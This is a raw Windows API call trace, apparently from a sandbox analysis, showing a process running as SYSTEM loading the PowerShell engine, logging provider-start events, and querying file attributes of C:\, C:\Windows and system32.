	[0089.268] GetLastError () returned 0xcb
	[0089.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.268] GetLastError () returned 0xcb
	[0089.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.268] GetLastError () returned 0xcb
	[0089.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.268] GetLastError () returned 0xcb
	[0089.294] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x367d10, nSize=0x14e904 | out: lpNameBuffer="WORKGROUP\\ZGW5TDPU$", nSize=0x14e904) returned 0x1
	[0089.294] GetLastError () returned 0xcb
	[0089.294] GetUserNameW (in: lpBuffer=0x361778, pcbBuffer=0x14e90c | out: lpBuffer="SYSTEM", pcbBuffer=0x14e90c) returned 1
	[0089.295] ReportEventW (hEventLog=0x35c0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x1d87828*="Registry", lpRawData=0x1d876e4) returned 1
	[0089.295] GetLastError () returned 0x0
	[0089.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e304, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.296] GetLastError () returned 0x0
	[0089.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.296] GetLastError () returned 0x0
	[0089.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.296] GetLastError () returned 0x0
	[0089.296] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x367d10, nSize=0x14e904 | out: lpNameBuffer="WORKGROUP\\ZGW5TDPU$", nSize=0x14e904) returned 0x1
	[0089.297] GetLastError () returned 0x0
	[0089.297] GetUserNameW (in: lpBuffer=0x361778, pcbBuffer=0x14e90c | out: lpBuffer="SYSTEM", pcbBuffer=0x14e90c) returned 1
	[0089.297] ReportEventW (hEventLog=0x35c0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x1d8b5c0*="Variable", lpRawData=0x1d8b47c) returned 1
	[0089.297] GetLastError () returned 0x0
	[0089.298] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.298] GetLastError () returned 0xcb
	[0089.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.300] GetLastError () returned 0xcb
	[0089.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e304, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0089.301] GetLastError () returned 0xcb
	[0089.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e2b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0089.301] GetLastError () returned 0xcb
	[0089.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e2b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0089.301] GetLastError () returned 0xcb
	[0089.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e2b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0089.301] GetLastError () returned 0xcb
	[0089.335] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x367d10, nSize=0x14e904 | out: lpNameBuffer="WORKGROUP\\ZGW5TDPU$", nSize=0x14e904) returned 0x1
	[0089.335] GetLastError () returned 0x3
	[0089.335] GetUserNameW (in: lpBuffer=0x361778, pcbBuffer=0x14e90c | out: lpBuffer="SYSTEM", pcbBuffer=0x14e90c) returned 1
	[0089.336] ReportEventW (hEventLog=0x35c0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x1d99334*="Certificate", lpRawData=0x1d991f0) returned 1
	[0089.336] GetLastError () returned 0x0
	[0089.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.344] GetLastError () returned 0xcb
	[0089.345] GetLogicalDrives () returned 0x4
	[0089.345] GetLastError () returned 0xcb
	[0089.345] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.345] GetLastError () returned 0xcb
	[0089.345] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0089.345] GetLastError () returned 0xcb
	[0089.346] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x361778 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0089.346] GetLastError () returned 0xcb
	[0089.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.347] GetLastError () returned 0xcb
	[0089.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.347] GetLastError () returned 0xcb
	[0089.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.353] GetLastError () returned 0xcb
	[0089.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.354] GetLastError () returned 0xcb
	[0089.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e2c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.355] GetLastError () returned 0xcb
	[0089.355] SetErrorMode (uMode=0x1) returned 0x1
	[0089.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1da027c | out: lpFileInformation=0x1da027c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0089.355] GetLastError () returned 0xcb
	[0089.355] SetErrorMode (uMode=0x1) returned 0x1
	[0089.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e2cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.355] GetLastError () returned 0xcb
	[0089.355] SetErrorMode (uMode=0x1) returned 0x1
	[0089.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1da0410 | out: lpFileInformation=0x1da0410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0089.355] GetLastError () returned 0xcb
	[0089.355] SetErrorMode (uMode=0x1) returned 0x1
	[0089.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.355] GetLastError () returned 0xcb
	[0089.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e414, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.357] GetLastError () returned 0xcb
	[0089.358] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e390, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.358] GetLastError () returned 0xcb
	[0089.358] SetErrorMode (uMode=0x1) returned 0x1
	[0089.358] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14e810 | out: lpFileInformation=0x14e810*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0089.358] GetLastError () returned 0xcb
	[0089.358] SetErrorMode (uMode=0x1) returned 0x1
	[0089.358] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e390, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.358] GetLastError () returned 0xcb
	[0089.358] SetErrorMode (uMode=0x1) returned 0x1
	[0089.358] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14e810 | out: lpFileInformation=0x14e810*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0089.358] GetLastError () returned 0xcb
	[0089.358] SetErrorMode (uMode=0x1) returned 0x1
	[0089.358] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e3a4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.358] GetLastError () returned 0xcb
	[0089.358] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e340, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.358] GetLastError () returned 0xcb
	[0089.358] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.358] GetLastError () returned 0xcb
	[0089.358] SetErrorMode (uMode=0x1) returned 0x1
	[0089.359] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14e810 | out: lpFileInformation=0x14e810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0089.359] GetLastError () returned 0xcb
	[0089.359] SetErrorMode (uMode=0x1) returned 0x1
	[0089.359] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.359] GetLastError () returned 0xcb
	[0089.359] SetErrorMode (uMode=0x1) returned 0x1
	[0089.359] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14e810 | out: lpFileInformation=0x14e810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0089.359] GetLastError () returned 0xcb
	[0089.359] SetErrorMode (uMode=0x1) returned 0x1
	[0089.359] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e3a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.359] GetLastError () returned 0xcb
	[0089.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14e340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.359] GetLastError () returned 0xcb
	[0089.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.359] GetLastError () returned 0xcb
	[0089.359] SetErrorMode (uMode=0x1) returned 0x1
	[0089.359] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14e810 | out: lpFileInformation=0x14e810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0089.359] GetLastError () returned 0xcb
	[0089.359] SetErrorMode (uMode=0x1) returned 0x1
	[0089.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.360] GetLastError () returned 0xcb
	[0089.360] SetErrorMode (uMode=0x1) returned 0x1
	[0089.360] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14e810 | out: lpFileInformation=0x14e810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0089.360] GetLastError () returned 0xcb
	[0089.360] SetErrorMode (uMode=0x1) returned 0x1
	[0089.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e3a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.360] GetLastError () returned 0xcb
	[0089.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14e340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.360] GetLastError () returned 0xcb
	[0089.360] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e39c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.360] GetLastError () returned 0xcb
	[0089.360] SetErrorMode (uMode=0x1) returned 0x1
	[0089.360] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14e81c | out: lpFileInformation=0x14e81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0089.360] GetLastError () returned 0xcb
	[0089.360] SetErrorMode (uMode=0x1) returned 0x1
	[0089.360] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e39c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.360] GetLastError () returned 0xcb
	[0089.360] SetErrorMode (uMode=0x1) returned 0x1
	[0089.360] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14e81c | out: lpFileInformation=0x14e81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0089.360] GetLastError () returned 0xcb
	[0089.360] SetErrorMode (uMode=0x1) returned 0x1
	[0089.360] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.360] GetLastError () returned 0xcb
	[0089.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14e34c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.361] GetLastError () returned 0xcb
	[0089.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e39c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.361] GetLastError () returned 0xcb
	[0089.361] SetErrorMode (uMode=0x1) returned 0x1
	[0089.361] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14e81c | out: lpFileInformation=0x14e81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0089.361] GetLastError () returned 0xcb
	[0089.361] SetErrorMode (uMode=0x1) returned 0x1
	[0089.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e39c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.361] GetLastError () returned 0xcb
	[0089.361] SetErrorMode (uMode=0x1) returned 0x1
	[0089.361] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14e81c | out: lpFileInformation=0x14e81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0089.361] GetLastError () returned 0xcb
	[0089.361] SetErrorMode (uMode=0x1) returned 0x1
	[0089.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.361] GetLastError () returned 0xcb
	[0089.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14e34c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.361] GetLastError () returned 0xcb
	[0089.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e46c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.362] GetLastError () returned 0xcb
	[0089.362] SetErrorMode (uMode=0x1) returned 0x1
	[0089.363] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1da81b8 | out: lpFileInformation=0x1da81b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0089.363] GetLastError () returned 0xcb
	[0089.363] SetErrorMode (uMode=0x1) returned 0x1
	[0089.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e4b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.363] GetLastError () returned 0xcb
	[0089.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e464, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.363] GetLastError () returned 0xcb
	[0089.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e464, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.363] GetLastError () returned 0xcb
	[0089.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e464, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.364] GetLastError () returned 0xcb
	[0089.395] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x367d10, nSize=0x14ea08 | out: lpNameBuffer="WORKGROUP\\ZGW5TDPU$", nSize=0x14ea08) returned 0x1
	[0089.395] GetLastError () returned 0xcb
	[0089.395] GetUserNameW (in: lpBuffer=0x361778, pcbBuffer=0x14ea10 | out: lpBuffer="SYSTEM", pcbBuffer=0x14ea10) returned 1
	[0089.396] ReportEventW (hEventLog=0x35c0004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x168b758*="Available", lpRawData=0x168b614) returned 1
	[0089.396] GetLastError () returned 0x0
	[0089.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.397] GetLastError () returned 0xcb
	[0089.398] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.398] GetLastError () returned 0xcb
	[0089.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.404] GetLastError () returned 0xcb
	[0089.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.404] GetLastError () returned 0xcb
	[0089.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.404] GetLastError () returned 0xcb
